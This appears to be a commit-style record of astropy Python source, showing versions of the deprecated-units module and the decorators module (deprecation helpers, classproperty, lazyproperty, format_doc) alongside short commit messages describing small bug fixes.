             doc='Biot: CGS (EMU) unit of current')
    # Only the *prefixed* forms of these units are deprecated, so register
    # just their prefixes here (the base units live in astrophys).
    for base_unit in (astrophys.jupiterMass, astrophys.earthMass,
                      astrophys.jupiterRad, astrophys.earthRad):
        _add_prefixes(base_unit, namespace=_ns, prefixes=True)
_initialize_module()
###########################################################################
# DOCSTRING
# This generates a docstring for this module that describes all of the
# standard units defined here.
from .utils import generate_unit_summary as _generate_unit_summary # noqa
from .utils import generate_prefixonly_unit_summary as _generate_prefixonly_unit_summary # noqa
if __doc__ is not None:
    __doc__ += _generate_unit_summary(globals())
    # Fix: _generate_prefixonly_unit_summary was imported but never called,
    # so the prefix-only deprecated units (the jupiterMass/earthMass/etc.
    # prefixes added by _initialize_module) never appeared in the docstring.
    __doc__ += _generate_prefixonly_unit_summary(globals())
def enable():
    """
    Enable deprecated units so that they appear in the results of
    `~astropy.units.UnitBase.find_equivalent_units` and
    `~astropy.units.UnitBase.compose`.
    May be used with the ``with`` statement to enable the deprecated
    units only temporarily.
    """
    # Both imports are deliberately function-local: ``add_enabled_units``
    # to avoid a circular import with .core, ``inspect`` to keep the
    # module namespace free of non-unit names.
    import inspect
    from .core import add_enabled_units
    this_module = inspect.getmodule(enable)
    return add_enabled_units(this_module)
fix missing call to _generate_prefixonly_unit_summary
# -*- coding: utf-8 -*-
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
This package defines deprecated units.
These units are not available in the top-level `astropy.units`
namespace. To use these units, you must import the `astropy.units.deprecated`
module::
>>> from astropy.units import deprecated
>>> q = 10. * deprecated.emu # doctest: +SKIP
To include them in `~astropy.units.UnitBase.compose` and the results of
`~astropy.units.UnitBase.find_equivalent_units`, do::
>>> from astropy.units import deprecated
>>> deprecated.enable() # doctest: +SKIP
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
# Module namespace into which def_unit/_add_prefixes inject the unit objects.
_ns = globals()
def _initialize_module():
    """Populate this module's namespace with the deprecated units."""
    # Imports are function-local so the module namespace exposes only units.
    from . import astrophys
    from . import cgs
    from .core import _add_prefixes, def_unit
    def_unit(['emu'], cgs.Bi, namespace=_ns,
             doc='Biot: CGS (EMU) unit of current')
    # Only the *prefixed* forms of these units are deprecated, so register
    # just their prefixes here (the base units live in astrophys).
    for base_unit in (astrophys.jupiterMass, astrophys.earthMass,
                      astrophys.jupiterRad, astrophys.earthRad):
        _add_prefixes(base_unit, namespace=_ns, prefixes=True)
_initialize_module()
###########################################################################
# DOCSTRING
# This generates a docstring for this module that describes all of the
# standard units defined here.
from .utils import generate_unit_summary as _generate_unit_summary # noqa
from .utils import generate_prefixonly_unit_summary as _generate_prefixonly_unit_summary # noqa
if __doc__ is not None:
    __doc__ += _generate_unit_summary(globals())
    # Prefix-only units (the jupiterMass/earthMass/etc. prefixes added in
    # _initialize_module) need their own summary pass; the plain unit
    # summary presumably skips them -- hence the second append.
    __doc__ += _generate_prefixonly_unit_summary(globals())
def enable():
    """
    Enable deprecated units so that they appear in the results of
    `~astropy.units.UnitBase.find_equivalent_units` and
    `~astropy.units.UnitBase.compose`.
    May be used with the ``with`` statement to enable the deprecated
    units only temporarily.
    """
    # Both imports are deliberately function-local: ``add_enabled_units``
    # to avoid a circular import with .core, ``inspect`` to keep the
    # module namespace free of non-unit names.
    import inspect
    from .core import add_enabled_units
    this_module = inspect.getmodule(enable)
    return add_enabled_units(this_module)
|
# -*- coding: utf-8 -*-
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""Sundry function and class decorators."""
import functools
import inspect
import textwrap
import threading
import types
import warnings
from inspect import signature
from functools import wraps
from .exceptions import (AstropyDeprecationWarning, AstropyUserWarning,
AstropyPendingDeprecationWarning)
__all__ = ['classproperty', 'deprecated', 'deprecated_attribute',
'deprecated_renamed_argument', 'format_doc',
'lazyproperty', 'sharedmethod', 'wraps']
_NotFound = object()
def deprecated(since, message='', name='', alternative='', pending=False,
               obj_type=None, warning_type=AstropyDeprecationWarning):
    """
    Used to mark a function or class as deprecated.

    To mark an attribute as deprecated, use `deprecated_attribute`.

    Parameters
    ----------
    since : str
        The release at which this API became deprecated. This is
        required.

    message : str, optional
        Override the default deprecation message. The format
        specifier ``func`` may be used for the name of the function,
        and ``alternative`` may be used in the deprecation message
        to insert the name of an alternative to the deprecated
        function. ``obj_type`` may be used to insert a friendly name
        for the type of object being deprecated.

    name : str, optional
        The name of the deprecated function or class; if not provided
        the name is automatically determined from the passed in
        function or class, though this is useful in the case of
        renamed functions, where the new function is just assigned to
        the name of the deprecated function. For example::

            def new_function():
                ...
            oldFunction = new_function

    alternative : str, optional
        An alternative function or class name that the user may use in
        place of the deprecated object. The deprecation warning will
        tell the user about this alternative if provided.

    pending : bool, optional
        If True, uses an AstropyPendingDeprecationWarning instead of a
        ``warning_type``.

    obj_type : str, optional
        The type of this object, if the automatically determined one
        needs to be overridden.

    warning_type : warning
        Warning to be issued.
        Default is `~astropy.utils.exceptions.AstropyDeprecationWarning`.
    """
    # Wrapper kinds whose underlying function must be extracted with
    # ``__func__`` and re-wrapped with the same wrapper type afterwards.
    method_types = (classmethod, staticmethod, types.MethodType)

    def deprecate_doc(old_doc, message):
        """
        Returns a given docstring with a deprecation message prepended
        to it.
        """
        if not old_doc:
            old_doc = ''
        old_doc = textwrap.dedent(old_doc).strip('\n')
        new_doc = (('\n.. deprecated:: {since}'
                    '\n    {message}\n\n'.format(
                        **{'since': since, 'message': message.strip()})) + old_doc)
        if not old_doc:
            # This is to prevent a spurious 'unexpected unindent' warning from
            # docutils when the original docstring was blank.
            new_doc += r'\ '
        return new_doc

    def get_function(func):
        """
        Given a function or classmethod (or other function wrapper type), get
        the function object.
        """
        if isinstance(func, method_types):
            func = func.__func__
        return func

    def deprecate_function(func, message, warning_type=warning_type):
        """
        Returns a wrapped function that displays ``warning_type``
        when it is called.
        """
        # Remember the wrapper type (classmethod/staticmethod/...) so the
        # replacement can be re-wrapped identically below.
        if isinstance(func, method_types):
            func_wrapper = type(func)
        else:
            func_wrapper = lambda f: f
        func = get_function(func)

        def deprecated_func(*args, **kwargs):
            if pending:
                category = AstropyPendingDeprecationWarning
            else:
                category = warning_type
            warnings.warn(message, category, stacklevel=2)
            return func(*args, **kwargs)

        # If this is an extension function, we can't call
        # functools.wraps on it, but we normally don't care.
        # This crazy way to get the type of a wrapper descriptor is
        # straight out of the Python 3.3 inspect module docs.
        if type(func) is not type(str.__dict__['__add__']):  # nopep8
            deprecated_func = functools.wraps(func)(deprecated_func)

        deprecated_func.__doc__ = deprecate_doc(
            deprecated_func.__doc__, message)

        return func_wrapper(deprecated_func)

    def deprecate_class(cls, message, warning_type=warning_type):
        """
        Update the docstring and wrap the ``__init__`` in-place (or ``__new__``
        if the class or any of the bases overrides ``__new__``) so it will give
        a deprecation warning when an instance is created.

        This won't work for extension classes because these can't be modified
        in-place and the alternatives don't work in the general case:

        - Using a new class that looks and behaves like the original doesn't
          work because the __new__ method of extension types usually makes sure
          that it's the same class or a subclass.

        - Subclassing the class and return the subclass can lead to problems
          with pickle and will look weird in the Sphinx docs.
        """
        cls.__doc__ = deprecate_doc(cls.__doc__, message)
        if cls.__new__ is object.__new__:
            cls.__init__ = deprecate_function(get_function(cls.__init__),
                                              message, warning_type)
        else:
            cls.__new__ = deprecate_function(get_function(cls.__new__),
                                             message, warning_type)
        return cls

    def deprecate(obj, message=message, name=name, alternative=alternative,
                  pending=pending, warning_type=warning_type):
        if obj_type is None:
            if isinstance(obj, type):
                obj_type_name = 'class'
            elif inspect.isfunction(obj):
                obj_type_name = 'function'
            elif inspect.ismethod(obj) or isinstance(obj, method_types):
                obj_type_name = 'method'
            else:
                obj_type_name = 'object'
        else:
            obj_type_name = obj_type

        if not name:
            name = get_function(obj).__name__

        altmessage = ''
        # A function in the ``message`` slot means no custom message was
        # given; fall back to the default phrasing.
        if not message or type(message) is type(deprecate):
            if pending:
                message = ('The {func} {obj_type} will be deprecated in a '
                           'future version.')
            else:
                message = ('The {func} {obj_type} is deprecated and may '
                           'be removed in a future version.')
            if alternative:
                altmessage = f'\n        Use {alternative} instead.'

        message = ((message.format(**{
            'func': name,
            'name': name,
            'alternative': alternative,
            'obj_type': obj_type_name})) +
                   altmessage)

        if isinstance(obj, type):
            return deprecate_class(obj, message, warning_type)
        else:
            return deprecate_function(obj, message, warning_type)

    # Support passing the object to deprecate directly in the ``message``
    # positional slot, e.g. ``deprecated('1.0', func)``.
    if type(message) is type(deprecate):
        return deprecate(message)

    return deprecate
def deprecated_attribute(name, since, message=None, alternative=None,
                         pending=False, warning_type=AstropyDeprecationWarning):
    """
    Used to mark a public attribute as deprecated. This creates a
    property that will warn when the given attribute name is accessed.
    To prevent the warning (i.e. for internal code), use the private
    name for the attribute by prepending an underscore
    (i.e. ``self._name``).

    Parameters
    ----------
    name : str
        The name of the deprecated attribute.

    since : str
        The release at which this API became deprecated. This is
        required.

    message : str, optional
        Override the default deprecation message. The format
        specifier ``name`` may be used for the name of the attribute,
        and ``alternative`` may be used in the deprecation message
        to insert the name of an alternative to the deprecated
        function.

    alternative : str, optional
        An alternative attribute that the user may use in place of the
        deprecated attribute. The deprecation warning will tell the
        user about this alternative if provided.

    pending : bool, optional
        If True, uses an AstropyPendingDeprecationWarning instead of
        ``warning_type``.

    warning_type : warning
        Warning to be issued.
        Default is `~astropy.utils.exceptions.AstropyDeprecationWarning`.

    Examples
    --------
    ::

        class MyClass:
            # Mark the old_name as deprecated
            old_name = misc.deprecated_attribute('old_name', '0.1')

            def method(self):
                self._old_name = 42
    """
    private_name = '_' + name

    # Build a single decorator and reuse it for the getter, setter and
    # deleter so that ``message``, ``alternative`` and ``pending`` are
    # actually honored (previously they were accepted but never forwarded
    # to `deprecated`, hence silently ignored).
    specific_deprecated = deprecated(since, name=name, obj_type='attribute',
                                     message=message, alternative=alternative,
                                     pending=pending,
                                     warning_type=warning_type)

    @specific_deprecated
    def get(self):
        return getattr(self, private_name)

    @specific_deprecated
    def set(self, val):
        setattr(self, private_name, val)

    @specific_deprecated
    def delete(self):
        delattr(self, private_name)

    return property(get, set, delete)
def deprecated_renamed_argument(old_name, new_name, since,
                                arg_in_kwargs=False, relax=False,
                                pending=False,
                                warning_type=AstropyDeprecationWarning,
                                alternative=''):
    """Deprecate a _renamed_ or _removed_ function argument.

    The decorator assumes that the argument with the ``old_name`` was removed
    from the function signature and the ``new_name`` replaced it at the
    **same position** in the signature. If the ``old_name`` argument is
    given when calling the decorated function the decorator will catch it and
    issue a deprecation warning and pass it on as ``new_name`` argument.

    Parameters
    ----------
    old_name : str or list/tuple thereof
        The old name of the argument.

    new_name : str or list/tuple thereof or `None`
        The new name of the argument. Set this to `None` to remove the
        argument ``old_name`` instead of renaming it.

    since : str or number or list/tuple thereof
        The release at which the old argument became deprecated.

    arg_in_kwargs : bool or list/tuple thereof, optional
        If the argument is not a named argument (for example it
        was meant to be consumed by ``**kwargs``) set this to
        ``True``. Otherwise the decorator will throw an Exception
        if the ``new_name`` cannot be found in the signature of
        the decorated function.
        Default is ``False``.

    relax : bool or list/tuple thereof, optional
        If ``False`` a ``TypeError`` is raised if both ``new_name`` and
        ``old_name`` are given. If ``True`` the value for ``new_name`` is used
        and a Warning is issued.
        Default is ``False``.

    pending : bool or list/tuple thereof, optional
        If ``True`` this will hide the deprecation warning and ignore the
        corresponding ``relax`` parameter value.
        Default is ``False``.

    warning_type : warning
        Warning to be issued.
        Default is `~astropy.utils.exceptions.AstropyDeprecationWarning`.

    alternative : str, optional
        An alternative function or class name that the user may use in
        place of the deprecated object if ``new_name`` is None. The deprecation
        warning will tell the user about this alternative if provided.

    Raises
    ------
    TypeError
        If the new argument name cannot be found in the function
        signature and arg_in_kwargs was False or if it is used to
        deprecate the name of the ``*args``-, ``**kwargs``-like arguments.
        At runtime such an Error is raised if both the new_name
        and old_name were specified when calling the function and
        "relax=False".

    Notes
    -----
    The decorator should be applied to a function where the **name**
    of an argument was changed but it applies the same logic.

    .. warning::
        If ``old_name`` is a list or tuple the ``new_name`` and ``since`` must
        also be a list or tuple with the same number of entries. ``relax`` and
        ``arg_in_kwarg`` can be a single bool (applied to all) or also a
        list/tuple with the same number of entries like ``new_name``, etc.

    Examples
    --------
    The deprecation warnings are not shown in the following examples.

    To deprecate a positional or keyword argument::

        >>> from astropy.utils.decorators import deprecated_renamed_argument
        >>> @deprecated_renamed_argument('sig', 'sigma', '1.0')
        ... def test(sigma):
        ...     return sigma
        >>> test(2)
        2
        >>> test(sigma=2)
        2
        >>> test(sig=2)  # doctest: +SKIP
        2

    To deprecate an argument caught inside the ``**kwargs`` the
    ``arg_in_kwargs`` has to be set::

        >>> @deprecated_renamed_argument('sig', 'sigma', '1.0',
        ...                             arg_in_kwargs=True)
        ... def test(**kwargs):
        ...     return kwargs['sigma']
        >>> test(sigma=2)
        2
        >>> test(sig=2)  # doctest: +SKIP
        2

    By default providing the new and old keyword will lead to an Exception. If
    a Warning is desired set the ``relax`` argument::

        >>> @deprecated_renamed_argument('sig', 'sigma', '1.0', relax=True)
        ... def test(sigma):
        ...     return sigma
        >>> test(sig=2)  # doctest: +SKIP
        2

    It is also possible to replace multiple arguments. The ``old_name``,
    ``new_name`` and ``since`` have to be `tuple` or `list` and contain the
    same number of entries::

        >>> @deprecated_renamed_argument(['a', 'b'], ['alpha', 'beta'],
        ...                             ['1.0', 1.2])
        ... def test(alpha, beta):
        ...     return alpha, beta
        >>> test(a=2, b=3)  # doctest: +SKIP
        (2, 3)

    In this case ``arg_in_kwargs`` and ``relax`` can be a single value (which
    is applied to all renamed arguments) or must also be a `tuple` or `list`
    with values for each of the arguments.
    """
    cls_iter = (list, tuple)
    if isinstance(old_name, cls_iter):
        n = len(old_name)
        # Assume that new_name and since are correct (tuple/list with the
        # appropriate length) in the spirit of the "consenting adults". But the
        # optional parameters may not be set, so if these are not iterables
        # wrap them.
        if not isinstance(arg_in_kwargs, cls_iter):
            arg_in_kwargs = [arg_in_kwargs] * n
        if not isinstance(relax, cls_iter):
            relax = [relax] * n
        if not isinstance(pending, cls_iter):
            pending = [pending] * n
    else:
        # To allow a uniform approach later on, wrap all arguments in lists.
        n = 1
        old_name = [old_name]
        new_name = [new_name]
        since = [since]
        arg_in_kwargs = [arg_in_kwargs]
        relax = [relax]
        pending = [pending]

    def decorator(function):
        # The named arguments of the function.
        arguments = signature(function).parameters
        keys = list(arguments.keys())
        position = [None] * n

        for i in range(n):
            # Determine the position of the argument.
            if arg_in_kwargs[i]:
                # Consumed by **kwargs; no fixed position to record.
                pass
            else:
                if new_name[i] is None:
                    param = arguments[old_name[i]]
                elif new_name[i] in arguments:
                    param = arguments[new_name[i]]
                # In case the argument is not found in the list of arguments
                # the only remaining possibility is that it should be caught
                # by some kind of **kwargs argument.
                # This case has to be explicitly specified, otherwise throw
                # an exception!
                else:
                    raise TypeError(
                        f'"{new_name[i]}" was not specified in the function '
                        'signature. If it was meant to be part of '
                        '"**kwargs" then set "arg_in_kwargs" to "True"')

                # There are several possibilities now:

                # 1.) Positional or keyword argument:
                if param.kind == param.POSITIONAL_OR_KEYWORD:
                    if new_name[i] is None:
                        position[i] = keys.index(old_name[i])
                    else:
                        position[i] = keys.index(new_name[i])

                # 2.) Keyword only argument:
                elif param.kind == param.KEYWORD_ONLY:
                    # These cannot be specified by position.
                    position[i] = None

                # 3.) positional-only argument, varargs, varkwargs or some
                #     unknown type:
                else:
                    raise TypeError(f'cannot replace argument "{new_name[i]}" '
                                    f'of kind {repr(param.kind)}.')

        @functools.wraps(function)
        def wrapper(*args, **kwargs):
            for i in range(n):
                message = (f'"{old_name[i]}" was deprecated in version '
                           f'{since[i]} and will be removed in a future '
                           'version. ')
                # The only way to have oldkeyword inside the function is
                # that it is passed as kwarg because the oldkeyword
                # parameter was renamed to newkeyword.
                if old_name[i] in kwargs:
                    value = kwargs.pop(old_name[i])
                    # Display the deprecation warning only when it's not
                    # pending.
                    if not pending[i]:
                        if new_name[i] is not None:
                            message += f'Use argument "{new_name[i]}" instead.'
                        elif alternative:
                            message += f'\n        Use {alternative} instead.'
                        warnings.warn(message, warning_type, stacklevel=2)

                    # Check if the newkeyword was given as well.
                    newarg_in_args = (position[i] is not None and
                                      len(args) > position[i])
                    newarg_in_kwargs = new_name[i] in kwargs

                    if newarg_in_args or newarg_in_kwargs:
                        if not pending[i]:
                            # If both are given print a Warning if relax is
                            # True or raise an Exception if relax is False.
                            if relax[i]:
                                warnings.warn(
                                    f'"{old_name[i]}" and "{new_name[i]}" '
                                    'keywords were set. '
                                    f'Using the value of "{new_name[i]}".',
                                    AstropyUserWarning)
                            else:
                                raise TypeError(
                                    f'cannot specify both "{old_name[i]}" and '
                                    f'"{new_name[i]}".')
                    else:
                        # Pass the value of the old argument with the
                        # name of the new argument to the function
                        if new_name[i] is not None:
                            kwargs[new_name[i]] = value
                        # If old argument has no replacement, cast it back.
                        # https://github.com/astropy/astropy/issues/9914
                        else:
                            kwargs[old_name[i]] = value

                # Deprecated keyword without replacement is given as
                # positional argument. Compare against None explicitly so
                # an argument at position 0 (which is falsy) is still
                # detected and warned about.
                elif (not pending[i] and not new_name[i] and
                      position[i] is not None and len(args) > position[i]):
                    if alternative:
                        message += f'\n        Use {alternative} instead.'
                    warnings.warn(message, warning_type, stacklevel=2)

            return function(*args, **kwargs)

        return wrapper

    return decorator
# TODO: This can still be made to work for setters by implementing an
# accompanying metaclass that supports it; we just don't need that right this
# second
class classproperty(property):
    """
    Similar to `property`, but allows class-level properties.  That is,
    a property whose getter is like a `classmethod`.

    The wrapped method may explicitly use the `classmethod` decorator (which
    must become before this decorator), or the `classmethod` may be omitted
    (it is implicit through use of this decorator).

    .. note::

        classproperty only works for *read-only* properties.  It does not
        currently allow writeable/deletable properties, due to subtleties of how
        Python descriptors work.  In order to implement such properties on a class
        a metaclass for that class must be implemented.

    Parameters
    ----------
    fget : callable
        The function that computes the value of this property (in particular,
        the function when this is used as a decorator) a la `property`.

    doc : str, optional
        The docstring for the property--by default inherited from the getter
        function.

    lazy : bool, optional
        If True, caches the value returned by the first call to the getter
        function, so that it is only called once (used for lazy evaluation
        of an attribute).  This is analogous to `lazyproperty`.  The ``lazy``
        argument can also be used when `classproperty` is used as a decorator
        (see the third example below).  When used in the decorator syntax this
        *must* be passed in as a keyword argument.

    Examples
    --------
    ::

        >>> class Foo:
        ...     _bar_internal = 1
        ...     @classproperty
        ...     def bar(cls):
        ...         return cls._bar_internal + 1
        ...
        >>> Foo.bar
        2
        >>> foo_instance = Foo()
        >>> foo_instance.bar
        2
        >>> foo_instance._bar_internal = 2
        >>> foo_instance.bar  # Ignores instance attributes
        2

    As previously noted, a `classproperty` is limited to implementing
    read-only attributes::

        >>> class Foo:
        ...     _bar_internal = 1
        ...     @classproperty
        ...     def bar(cls):
        ...         return cls._bar_internal
        ...     @bar.setter
        ...     def bar(cls, value):
        ...         cls._bar_internal = value
        ...
        Traceback (most recent call last):
        ...
        NotImplementedError: classproperty can only be read-only; use a
        metaclass to implement modifiable class-level properties

    When the ``lazy`` option is used, the getter is only called once::

        >>> class Foo:
        ...     @classproperty(lazy=True)
        ...     def bar(cls):
        ...         print("Performing complicated calculation")
        ...         return 1
        ...
        >>> Foo.bar
        Performing complicated calculation
        1
        >>> Foo.bar
        1

    If a subclass inherits a lazy `classproperty` the property is still
    re-evaluated for the subclass::

        >>> class FooSub(Foo):
        ...     pass
        ...
        >>> FooSub.bar
        Performing complicated calculation
        1
        >>> FooSub.bar
        1
    """

    def __new__(cls, fget=None, doc=None, lazy=False):
        if fget is None:
            # Being used as a decorator--return a wrapper that implements
            # decorator syntax
            def wrapper(func):
                return cls(func, lazy=lazy)
            return wrapper
        return super().__new__(cls)

    def __init__(self, fget, doc=None, lazy=False):
        self._lazy = lazy
        if lazy:
            self._lock = threading.RLock()   # Protects _cache
            self._cache = {}
        fget = self._wrap_fget(fget)
        super().__init__(fget=fget, doc=doc)
        # There is a buglet in Python where self.__doc__ doesn't
        # get set properly on instances of property subclasses if
        # the doc argument was used rather than taking the docstring
        # from fget
        # Related Python issue: https://bugs.python.org/issue24766
        if doc is not None:
            self.__doc__ = doc

    def __get__(self, obj, objtype):
        if self._lazy:
            # Double-checked locking: cheap unlocked read first, then
            # re-check under the lock before computing.
            val = self._cache.get(objtype, _NotFound)
            if val is _NotFound:
                with self._lock:
                    # Check if another thread initialised before we locked.
                    val = self._cache.get(objtype, _NotFound)
                    if val is _NotFound:
                        val = self.fget.__wrapped__(objtype)
                        self._cache[objtype] = val
        else:
            # The base property.__get__ will just return self here;
            # instead we pass objtype through to the original wrapped
            # function (which takes the class as its sole argument)
            val = self.fget.__wrapped__(objtype)
        return val

    def getter(self, fget):
        return super().getter(self._wrap_fget(fget))

    def setter(self, fset):
        raise NotImplementedError(
            "classproperty can only be read-only; use a metaclass to "
            "implement modifiable class-level properties")

    def deleter(self, fdel):
        raise NotImplementedError(
            "classproperty can only be read-only; use a metaclass to "
            "implement modifiable class-level properties")

    @staticmethod
    def _wrap_fget(orig_fget):
        if isinstance(orig_fget, classmethod):
            orig_fget = orig_fget.__func__

        # Using stock functools.wraps instead of the fancier version
        # found later in this module, which is overkill for this purpose
        @functools.wraps(orig_fget)
        def fget(obj):
            return orig_fget(obj.__class__)

        return fget
# Adapted from the recipe at
# http://code.activestate.com/recipes/363602-lazy-property-evaluation
class lazyproperty(property):
    """
    Works similarly to property(), but computes the value only once.

    This essentially memorizes the value of the property by storing the result
    of its computation in the ``__dict__`` of the object instance.  This is
    useful for computing the value of some property that should otherwise be
    invariant.  For example::

        >>> class LazyTest:
        ...     @lazyproperty
        ...     def complicated_property(self):
        ...         print('Computing the value for complicated_property...')
        ...         return 42
        ...
        >>> lt = LazyTest()
        >>> lt.complicated_property
        Computing the value for complicated_property...
        42
        >>> lt.complicated_property
        42

    As the example shows, the second time ``complicated_property`` is accessed,
    the ``print`` statement is not executed.  Only the return value from the
    first access off ``complicated_property`` is returned.

    By default, a setter and deleter are used which simply overwrite and
    delete, respectively, the value stored in ``__dict__``. Any user-specified
    setter or deleter is executed before executing these default actions.
    The one exception is that the default setter is not run if the user setter
    already sets the new value in ``__dict__`` and returns that value and the
    returned value is not ``None``.
    """

    def __init__(self, fget, fset=None, fdel=None, doc=None):
        super().__init__(fget, fset, fdel, doc)
        # Instance-attribute name under which the computed value is cached.
        self._key = self.fget.__name__
        self._lock = threading.RLock()

    def __get__(self, obj, owner=None):
        try:
            obj_dict = obj.__dict__
            val = obj_dict.get(self._key, _NotFound)
            if val is _NotFound:
                with self._lock:
                    # Check if another thread beat us to it.
                    val = obj_dict.get(self._key, _NotFound)
                    if val is _NotFound:
                        val = self.fget(obj)
                        obj_dict[self._key] = val
            return val
        except AttributeError:
            # Class-level access (obj is None) has no __dict__ to consult;
            # return the descriptor itself like a plain property would.
            if obj is None:
                return self
            raise

    def __set__(self, obj, val):
        obj_dict = obj.__dict__
        if self.fset:
            ret = self.fset(obj, val)
            if ret is not None and obj_dict.get(self._key) is ret:
                # By returning the value the setter signals that it
                # took over setting the value in obj.__dict__; this
                # mechanism allows it to override the input value
                return
        obj_dict[self._key] = val

    def __delete__(self, obj):
        if self.fdel:
            self.fdel(obj)
        # Drop the cached value if present (a single pop; the previous
        # version followed this with a redundant membership-check-and-del
        # that could never fire).  The next access recomputes the value.
        obj.__dict__.pop(self._key, None)
class sharedmethod(classmethod):
    """
    Method decorator that lets a single name act as both an instance
    method and a `classmethod`.

    Accessed through an instance, the decorated function behaves like a
    normal bound method: the instance is passed as the first (``self``)
    argument.  Accessed through the class, it behaves like a
    `classmethod` instead, receiving the class as its first argument.

    Additionally, if the class's *metaclass* defines a callable with the
    same name, class-level access delegates to that metaclass
    implementation.  This allows the classmethod variant to be written
    separately from the instance-method variant.
    """

    def __get__(self, obj, objtype=None):
        if obj is not None:
            # Instance access: bind the wrapped function to the instance.
            return self._make_method(self.__func__, obj)
        # Class access: prefer a same-named callable on the metaclass,
        # otherwise fall back to the wrapped function bound to the class.
        candidate = getattr(type(objtype), self.__func__.__name__, None)
        target = candidate if callable(candidate) else self.__func__
        return self._make_method(target, objtype)

    @staticmethod
    def _make_method(func, instance):
        # ``instance`` may be an object or a class; either way it becomes
        # the bound first argument of ``func``.
        return types.MethodType(func, instance)
def format_doc(docstring, *args, **kwargs):
    """
    Replace the docstring of the decorated object, then format it.

    Formatting follows :meth:`str.format`, and the special placeholder
    ``{__doc__}`` expands to the decorated object's original docstring.
    The primary use is sharing one *long* docstring between several
    functions whose documentation is identical or nearly so.

    Parameters
    ----------
    docstring : str or object or None
        The text to install as the new docstring. A string is used
        directly; any other object contributes its own ``__doc__``;
        ``None`` means the decorated object's existing docstring is
        formatted in place.
    args :
        Positional values forwarded to :meth:`str.format`.
    kwargs :
        Keyword values forwarded to :meth:`str.format`. The decorated
        object's original docstring (or ``''`` if it has none) is added
        under the key ``'__doc__'``.

    Raises
    ------
    ValueError
        If the resolved docstring template is empty.
    IndexError, KeyError
        If a placeholder in the template is not filled by ``args`` /
        ``kwargs``; see :meth:`str.format`.

    Notes
    -----
    Only the template itself is formatted — strings supplied via
    ``args``/``kwargs`` (including the inserted original docstring) are
    copied in verbatim.  Decorating a second time with ``None`` as the
    template therefore allows a second formatting pass.  Using this
    decorator lets tools such as Sphinx see the fully expanded docstring.

    Examples
    --------
    ::

        >>> from astropy.utils.decorators import format_doc
        >>> @format_doc('''Perform {0}.''', 'addition')
        ... def add(num1, num2):
        ...     return num1 + num2
        ...
        >>> add.__doc__
        'Perform addition.'
    """
    def apply(target):
        # Resolve the template: the target's own docstring (None case),
        # the given string, or the docstring of the given object.
        if docstring is None:
            template = target.__doc__
            # Clear it so the original text is not self-inserted awkwardly
            # through the {__doc__} placeholder.
            target.__doc__ = None
        elif isinstance(docstring, str):
            template = docstring
        else:
            template = docstring.__doc__

        if not template:
            # An empty template is almost certainly not what was wanted.
            raise ValueError('docstring must be a string or containing a '
                             'docstring that is not empty.')

        # Expose the (possibly empty) original docstring to the template.
        kwargs['__doc__'] = target.__doc__ or ''
        target.__doc__ = template.format(*args, **kwargs)
        return target

    return apply
Fix accidental double-delete in lazyproperty.__delete__
Alternate deletion code (a dict.pop with a default) was added, but the
original "check membership, then del" lines were never removed, leaving
a redundant second delete after the pop.
# -*- coding: utf-8 -*-
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""Sundry function and class decorators."""
import functools
import inspect
import textwrap
import threading
import types
import warnings
from inspect import signature
from functools import wraps
from .exceptions import (AstropyDeprecationWarning, AstropyUserWarning,
AstropyPendingDeprecationWarning)
__all__ = ['classproperty', 'deprecated', 'deprecated_attribute',
'deprecated_renamed_argument', 'format_doc',
'lazyproperty', 'sharedmethod', 'wraps']
_NotFound = object()
def deprecated(since, message='', name='', alternative='', pending=False,
               obj_type=None, warning_type=AstropyDeprecationWarning):
    """
    Used to mark a function or class as deprecated.
    To mark an attribute as deprecated, use `deprecated_attribute`.
    Parameters
    ----------
    since : str
        The release at which this API became deprecated. This is
        required.
    message : str, optional
        Override the default deprecation message. The format
        specifier ``func`` may be used for the name of the function,
        and ``alternative`` may be used in the deprecation message
        to insert the name of an alternative to the deprecated
        function. ``obj_type`` may be used to insert a friendly name
        for the type of object being deprecated.
    name : str, optional
        The name of the deprecated function or class; if not provided
        the name is automatically determined from the passed in
        function or class, though this is useful in the case of
        renamed functions, where the new function is just assigned to
        the name of the deprecated function. For example::
            def new_function():
                ...
            oldFunction = new_function
    alternative : str, optional
        An alternative function or class name that the user may use in
        place of the deprecated object. The deprecation warning will
        tell the user about this alternative if provided.
    pending : bool, optional
        If True, uses a AstropyPendingDeprecationWarning instead of a
        ``warning_type``.
    obj_type : str, optional
        The type of this object, if the automatically determined one
        needs to be overridden.
    warning_type : warning
        Warning to be issued.
        Default is `~astropy.utils.exceptions.AstropyDeprecationWarning`.
    """
    # Wrapper types that hide the underlying function; these are unwrapped
    # before decorating and re-wrapped afterwards (see deprecate_function).
    method_types = (classmethod, staticmethod, types.MethodType)
    def deprecate_doc(old_doc, message):
        """
        Returns a given docstring with a deprecation message prepended
        to it.
        """
        if not old_doc:
            old_doc = ''
        old_doc = textwrap.dedent(old_doc).strip('\n')
        new_doc = (('\n.. deprecated:: {since}'
                    '\n {message}\n\n'.format(
                    **{'since': since, 'message': message.strip()})) + old_doc)
        if not old_doc:
            # This is to prevent a spurious 'unexpected unindent' warning from
            # docutils when the original docstring was blank.
            new_doc += r'\ '
        return new_doc
    def get_function(func):
        """
        Given a function or classmethod (or other function wrapper type), get
        the function object.
        """
        if isinstance(func, method_types):
            func = func.__func__
        return func
    def deprecate_function(func, message, warning_type=warning_type):
        """
        Returns a wrapped function that displays ``warning_type``
        when it is called.
        """
        # Remember the wrapper type (classmethod/staticmethod) so it can be
        # re-applied to the deprecated wrapper at the end.
        if isinstance(func, method_types):
            func_wrapper = type(func)
        else:
            func_wrapper = lambda f: f
        func = get_function(func)
        def deprecated_func(*args, **kwargs):
            if pending:
                category = AstropyPendingDeprecationWarning
            else:
                category = warning_type
            warnings.warn(message, category, stacklevel=2)
            return func(*args, **kwargs)
        # If this is an extension function, we can't call
        # functools.wraps on it, but we normally don't care.
        # This crazy way to get the type of a wrapper descriptor is
        # straight out of the Python 3.3 inspect module docs.
        if type(func) is not type(str.__dict__['__add__']): # nopep8
            deprecated_func = functools.wraps(func)(deprecated_func)
        deprecated_func.__doc__ = deprecate_doc(
            deprecated_func.__doc__, message)
        return func_wrapper(deprecated_func)
    def deprecate_class(cls, message, warning_type=warning_type):
        """
        Update the docstring and wrap the ``__init__`` in-place (or ``__new__``
        if the class or any of the bases overrides ``__new__``) so it will give
        a deprecation warning when an instance is created.
